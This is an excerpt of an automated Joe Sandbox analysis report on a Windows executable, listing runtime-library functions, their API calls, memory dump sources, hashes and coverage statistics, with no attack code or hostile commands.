                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                • String ID:
                                                • API String ID: 167067550-0
                                                • Opcode ID: c63b405d6cd698a9abe5f441b7264acc718f725c5c89cae8eb774c7dd144ae32
                                                • Instruction ID: ed3b0161dcbd786a60ce03c6e6ddb03323e3aa8c31cfe54037dad0f6186b5a14
                                                • Opcode Fuzzy Hash: c63b405d6cd698a9abe5f441b7264acc718f725c5c89cae8eb774c7dd144ae32
                                                • Instruction Fuzzy Hash: B821B371A08215AFDB32AF65AC81C2BB7ACFF013667518618FC159B6A1D771ED0887A0
                                                Function 00353A9B Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetLastError.KERNEL32(?,?,?,0034D9A7,?,?,?,?,00350D23,?), ref: 00353AA0
                                                • _free.LIBCMT ref: 00353AFD
                                                • _free.LIBCMT ref: 00353B33
                                                • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0034D9A7,?,?,?,?,00350D23,?), ref: 00353B3E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast_free
                                                • String ID:
                                                • API String ID: 2283115069-0
                                                • Opcode ID: 8edfcb9f12149c63bc6a6ba0ae7ee304a73c3c12dc9476c6e8da2b9233575870
                                                • Instruction ID: a289510b5e6bc828d3a3575d06268db2c79e487243bd7580d17a2a2255e18f6b
                                                • Opcode Fuzzy Hash: 8edfcb9f12149c63bc6a6ba0ae7ee304a73c3c12dc9476c6e8da2b9233575870
                                                • Instruction Fuzzy Hash: 07112C362082457AC61766799C86E2B215EABC13FFB254638FD218B1F1FEA18D0D4111
                                                Function 00353BF2 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetLastError.KERNEL32(?,00000000,?,00350CBD,00354922,?,?,0034956E,00000000,?,00311FF9,00000000,?,00311F08), ref: 00353BF7
                                                • _free.LIBCMT ref: 00353C54
                                                • _free.LIBCMT ref: 00353C8A
                                                • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000000,?,00350CBD,00354922,?,?,0034956E,00000000,?,00311FF9,00000000), ref: 00353C95
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast_free
                                                • String ID:
                                                • API String ID: 2283115069-0
                                                • Opcode ID: 9955758afc1369dee075e7f6f5141ec75e3f23888553c3ba9ee71085482232de
                                                • Instruction ID: 5c8be24bd4030d01fa06d6d4b6baf22541d4bbf17b20691bc038ed516d1e86aa
                                                • Opcode Fuzzy Hash: 9955758afc1369dee075e7f6f5141ec75e3f23888553c3ba9ee71085482232de
                                                • Instruction Fuzzy Hash: 4B1129362042407AC61362759C86E2B226EABC13BFF254538FD25AB1F1EEA18D4D4111
                                                Function 0035DED2 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,0035C42F,?,00000001,?,00000001,?,003565A1,?,?,00000001), ref: 0035DEE9
                                                • GetLastError.KERNEL32(?,0035C42F,?,00000001,?,00000001,?,003565A1,?,?,00000001,?,00000001,?,00356AED,RG5), ref: 0035DEF5
                                                  • Part of subcall function 0035DEBB: CloseHandle.KERNEL32(FFFFFFFE,0035DF05,?,0035C42F,?,00000001,?,00000001,?,003565A1,?,?,00000001,?,00000001), ref: 0035DECB
                                                • ___initconout.LIBCMT ref: 0035DF05
                                                  • Part of subcall function 0035DE7D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0035DEAC,0035C41C,00000001,?,003565A1,?,?,00000001,?), ref: 0035DE90
                                                • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,0035C42F,?,00000001,?,00000001,?,003565A1,?,?,00000001,?), ref: 0035DF1A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                • String ID:
                                                • API String ID: 2744216297-0
                                                • Opcode ID: daf504d6ff55d788b763fa43e7e294131883576de40b8efc9cdd5075684359c0
                                                • Instruction ID: 25458cda95ce238b4d80daf49cd3c952af0e4e91e5cb778e8a707a6d28d30295
                                                • Opcode Fuzzy Hash: daf504d6ff55d788b763fa43e7e294131883576de40b8efc9cdd5075684359c0
                                                • Instruction Fuzzy Hash: 55F0C036541224BBCF332F99DC05D9E7F6AFB097A2F058414FE1A9A130D6728934DB90
                                                Function 00353010 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                Download Yara Rule
                                                APIs
                                                • _free.LIBCMT ref: 00353019
                                                  • Part of subcall function 003543F6: RtlFreeHeap.NTDLL(00000000,00000000,?,00358B3C,?,00000000,?,?,?,00358B63,?,00000007,?,?,00358F65,?), ref: 0035440C
                                                  • Part of subcall function 003543F6: GetLastError.KERNEL32(?,?,00358B3C,?,00000000,?,?,?,00358B63,?,00000007,?,?,00358F65,?,?), ref: 0035441E
                                                • _free.LIBCMT ref: 0035302C
                                                • _free.LIBCMT ref: 0035303D
                                                • _free.LIBCMT ref: 0035304E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: a8946b72ad421da6b51e11be9c67fd5e1bc618e99b75d63da0049056c60dee93
                                                • Instruction ID: 4c08a7605281c8143f101cc8455805f494d5770b4e93c04653425c44da5b86f5
                                                • Opcode Fuzzy Hash: a8946b72ad421da6b51e11be9c67fd5e1bc618e99b75d63da0049056c60dee93
                                                • Instruction Fuzzy Hash: A3E0BF76811220EFC617AF18FD018463A69F746785B019136F90557231EBF609679B81
                                                Function 003203E0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 304COMMON
                                                Download Yara Rule
                                                APIs
                                                • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000,8CDA9266), ref: 00320436
                                                • CreateDirectoryA.KERNEL32(?,00000000,?,?,?,?), ref: 0032070F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateDirectoryFolderPathSpecial
                                                • String ID: bm
                                                • API String ID: 2904043388-599385607
                                                • Opcode ID: c5e8f28931cf4d1c283df74b4d7a15e5b727ef6b460ffdf26c1e47c63e6dd10c
                                                • Instruction ID: 1b882c4f10234b58cdfd3118b0cac3e5816c074566cea7c1daa9458516a67652
                                                • Opcode Fuzzy Hash: c5e8f28931cf4d1c283df74b4d7a15e5b727ef6b460ffdf26c1e47c63e6dd10c
                                                • Instruction Fuzzy Hash: 7702DD749092A88BDB66CF28DD85BDABBB0AF59300F1082D9D94D67251EB316FC5CF40
                                                Function 003506BF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 263COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-
                                                • API String ID: 1302938615-2137968064
                                                • Opcode ID: 5ab2d7c5e4061503a115a80006edc564ab3dd35c5641275d1df21426edd52395
                                                • Instruction ID: 4dfb2d80d3f0a0a82dee76e4e03d15f1cdfbcb0c331fbb28f5253edcd82e56b8
                                                • Opcode Fuzzy Hash: 5ab2d7c5e4061503a115a80006edc564ab3dd35c5641275d1df21426edd52395
                                                • Instruction Fuzzy Hash: FC91D430D002499EDF2ACF68C450EEDBBB5EF15322F158256EC71AB2B1D33299498F91
                                                Function 00357D4D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 166COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 003578E8: GetOEMCP.KERNEL32(00000000,00357B59,?,?,#5,00350D23,?), ref: 00357913
                                                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,#5,00357BA0,?,00000000,?,?,?,?,?,?,00350D23), ref: 00357DAB
                                                • GetCPInfo.KERNEL32(00000000,00357BA0,?,#5,00357BA0,?,00000000,?,?,?,?,?,?,00350D23,?), ref: 00357DED
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CodeInfoPageValid
                                                • String ID: #5
                                                • API String ID: 546120528-643275717
                                                • Opcode ID: 9d160383ffe5fd2a9e82fe92cc8f4d560faabd4d620fa691245c52e02d82c2b3
                                                • Instruction ID: 6f42aabae9bc063566fb2c510228ae61a1cee409fa1c5601675ad85b95e8ebc8
                                                • Opcode Fuzzy Hash: 9d160383ffe5fd2a9e82fe92cc8f4d560faabd4d620fa691245c52e02d82c2b3
                                                • Instruction Fuzzy Hash: 29513770A083419EDB238F75E846EBBBBF9EF51301F1544AED8868B171D374994ACB90
                                                Function 00352747 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                Download Yara Rule
                                                Strings
                                                • C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, xrefs: 0035278A, 00352791, 003527C7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe
                                                • API String ID: 0-1535992457
                                                • Opcode ID: fb71c3e13894944171f2f164e2a6f5bee1054a915e605f8639227fbb32668403
                                                • Instruction ID: d0456df0a1781e3fd07b7e11c25d69c1ede0cdab893e00f922a5066b475ab6e5
                                                • Opcode Fuzzy Hash: fb71c3e13894944171f2f164e2a6f5bee1054a915e605f8639227fbb32668403
                                                • Instruction Fuzzy Hash: 10416071A00214AFCB27DF999C81D9FBBA8EB9A311F144066ED05DB221E7719E49CB90
                                                Function 0034B4BD Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0034B4E2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: EncodePointer
                                                • String ID: MOC$RCC
                                                • API String ID: 2118026453-2084237596
                                                • Opcode ID: 0ee248c0cb2eda5c229afa95536b12b44088d1c0097e99c1b334b64d8187dd6f
                                                • Instruction ID: b7d132283cf7592c189ea9f7d6c30af2ffa3a6434c2540b94a656475cccd6f5c
                                                • Opcode Fuzzy Hash: 0ee248c0cb2eda5c229afa95536b12b44088d1c0097e99c1b334b64d8187dd6f
                                                • Instruction Fuzzy Hash: AD413571900209AFCF16DF98C881AAEBBF5FF49304F198199F904AA261D335EE50DB51
                                                Function 00339AE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Concurrency::cancel_current_task.LIBCPMTD ref: 00339B2E
                                                • _Allocate.LIBCONCRTD ref: 00339B42
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateConcurrency::cancel_current_task
                                                • String ID: 863
                                                • API String ID: 806954194-3824524633
                                                • Opcode ID: 64e35e075492f13ee1684285b83e23fba8a1a55d921d896b448104365721c70b
                                                • Instruction ID: cb1b25922d74a3f46533ad6c1f62a2542b8fe4fd8fa44a1accb9610b3f8a397f
                                                • Opcode Fuzzy Hash: 64e35e075492f13ee1684285b83e23fba8a1a55d921d896b448104365721c70b
                                                • Instruction Fuzzy Hash: 85418FB5D052089FCB05DFA9D481ADEBBF5FB48310F10822AE815AB394D774A945CF94
                                                Function 00353D47 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free
                                                • String ID: (6
                                                • API String ID: 269201875-3915136759
                                                • Opcode ID: 0c2f118e5bf29065b21aa06590513d540127bfed78110a0adde84c47a4160c1e
                                                • Instruction ID: b9765bb4dc34f7fa8790d9d079e76462dcc32f7c0eb2b7c3b06c0304d697d385
                                                • Opcode Fuzzy Hash: 0c2f118e5bf29065b21aa06590513d540127bfed78110a0adde84c47a4160c1e
                                                • Instruction Fuzzy Hash: 9311E672A043009FD7229B28BC41F5533F9A701775F154636FD20CB1F1D3B0D94A8A41
                                                Function 00349348 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0034938C
                                                • ___raise_securityfailure.LIBCMT ref: 00349473
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FeaturePresentProcessor___raise_securityfailure
                                                • String ID: H6
                                                • API String ID: 3761405300-1886276026
                                                • Opcode ID: a7236794d61280221f0e7649c1f16176bbc9656232de5e99110684dfe2b7c491
                                                • Instruction ID: 5e8aaf82fa2a7d80e831d4ec923f81a08491ab52442bcc52fda77303123a2c60
                                                • Opcode Fuzzy Hash: a7236794d61280221f0e7649c1f16176bbc9656232de5e99110684dfe2b7c491
                                                • Instruction Fuzzy Hash: 4221C2BD510204DAE717CF19E986B447BE8BB08314F14C42AE90A8B2B0EBF0688DCF55
                                                Function 003131B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFileAttributesA.KERNEL32(00000001), ref: 003131F0
                                                • GetLastError.KERNEL32 ref: 003131FF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AttributesErrorFileLast
                                                • String ID: $
                                                • API String ID: 1799206407-3993045852
                                                • Opcode ID: 1ff553679473319bf00e73147e12cb811880c602c7c82da3cf367486e38e5db4
                                                • Instruction ID: 244401a5f92a7fa171c89b40442ddc40d413fc6c39852d4e643d00b231412cbc
                                                • Opcode Fuzzy Hash: 1ff553679473319bf00e73147e12cb811880c602c7c82da3cf367486e38e5db4
                                                • Instruction Fuzzy Hash: 2911E574C0820DEBCF2AEFA4E8481EDBB74AB0E315F1199A9D81267240D2355BC6DF91
                                                Function 003578E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetOEMCP.KERNEL32(00000000,00357B59,?,?,#5,00350D23,?), ref: 00357913
                                                • GetACP.KERNEL32(00000000,00357B59,?,?,#5,00350D23,?), ref: 0035792A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: #5
                                                • API String ID: 0-643275717
                                                • Opcode ID: 2520d96abb974920db6b1e849c440923f20602f3b7657c64b35b81de7b930f4a
                                                • Instruction ID: c84ea5e3bb711c5047b93ce6f194a1c918648027568913f49b09ac5d28ff8157
                                                • Opcode Fuzzy Hash: 2520d96abb974920db6b1e849c440923f20602f3b7657c64b35b81de7b930f4a
                                                • Instruction Fuzzy Hash: ADF06D304042048FDB12DF68E858BA877B9BB4233AF644345E966CA5F1D7B19E49CB54

                                                Execution Graph

                                                Execution Coverage:31.2%
                                                Dynamic/Decrypted Code Coverage:5%
                                                Signature Coverage:15.4%
                                                Total number of Nodes:279
                                                Total number of Limit Nodes:9
